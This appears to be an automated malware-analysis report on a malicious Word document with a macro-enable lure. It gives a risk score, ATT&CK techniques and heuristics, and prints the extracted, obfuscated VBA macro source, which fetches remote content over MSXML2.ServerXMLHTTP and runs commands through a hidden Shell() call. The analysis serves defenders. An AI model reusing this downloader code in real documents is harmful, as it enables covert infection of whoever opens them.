MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros that utilize `Shell()` and `CreateObject()` calls, indicating an attempt to execute arbitrary code. The VBA script attempts to download content from a URL using `MSXML2.ServerXMLHTTP` and `CreateObject`. The document body presents a lure to encourage macro execution. The presence of `Environ()` calls suggests potential interaction with environment variables.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3554 bytes |
SHA-256: 8a499abb5bf0aa9ba72b8cc7b9151cf5e1ca98f44127612f7665f3ca47641c0f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
Xjdkhjfwefw = (a.responseText)
End Function
Attribute VB_Name = "Module2"
Public Function Goabc(sps As String)
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
Goabc = Environ(sps)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
ashdUHhda = nbqjbdjqw
hausd = Tan(11) + 225
'asdsad
JQHWDJQWB = "E"
JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
'Hukqjdhjksahd
Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Attribute VB_Name = "Module3"
Public Function India(dnuwhd As String, b As String, c As Integer)
Dim telnasdhS As String
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
Dim kkqhwdjbqhjdwqbdhjqwbdjqsd As Range, aaHRjkasnjkdaksbdasdsd As Range
Set kkqhwdjbqhjdwqbdhjqwbdjqsd = ActiveDocument.Range
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1qhwdjko2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1asjdqk2 e1o2ej1l2kje k2l1"
ASJADQDBBBNS = "2jke hjk1g hhdjkqwj12ge1k2 e1o2ej1l2kje k2l1"
AFWSJDQDBBBNS = "2jke hjbasjdk1g hj12ge1k2 e1o2ej1l2kje k2l1"
With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
.Text = dnuwhd
.MatchWholeWord = True
kkqhwdjbqhjdwqbdhjqwbdjqsd.Find.Execute
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseEnd
Dim wdwq As String
Set aaHRjkasnjkdaksbdasdsd = ActiveDocument.Range
Dim wdsadwq As String
aaHRjkasnjkdaksbdasdsd.Start = kkqhwdjbqhjdwqbdhjqwbdjqsd.End
.Text = b
.MatchWholeWord = True
.Execute
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseStart
aaHRjkasnjkdaksbdasdsd.End = kkqhwdjbqhjdwqbdhjqwbdjqsd.Start
If (c = 1) Then
telnasdhS = aaHRjkasnjkdaksbdasdsd.Delete
End If
If (c = 2) Then
aaHRjkasnjkdaksbdasdsd.Font.Color = wdColorBlack
End If
Dim hduwaa As Integer
hduwaa = 1 - 2 ^ 4
QHUDW = Chr(5 + 5 + 23 + Sgn(hduwaa))
If (c = 3) Then
With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
.Text = a
.Replacement.Text = QHUDW
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
Public Function HowEver(hqwdugqw As Variant, hasdgja)
VHJWDQ = "b2nme2b1 hgj12hg21jhg e"
hqwdugqw = Shell(hasdgja, 0)
HowEver = hqwdugqw
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.